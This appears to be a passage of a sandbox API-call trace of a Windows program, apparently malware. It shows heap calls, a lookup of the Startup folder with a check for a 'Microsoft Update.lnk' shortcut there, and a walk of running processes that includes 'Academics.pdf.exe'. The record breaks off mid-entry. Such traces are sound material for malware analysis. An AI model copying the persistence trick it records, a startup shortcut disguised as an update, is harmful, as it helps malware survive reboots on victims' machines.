[0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.285] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0297.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0297.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0297.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0297.286] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0297.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0297.286] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0297.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0297.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0297.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0297.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0297.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0297.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0297.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.287] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0297.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0297.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0297.291] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0297.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0297.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.310] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0297.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0297.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0297.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0297.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0297.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0297.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0297.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0297.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0297.332] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0297.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0297.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0297.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0297.335] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0297.336] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0297.337] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0297.338] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0297.339] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0297.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0297.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0297.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0297.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0297.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0297.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.349] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, 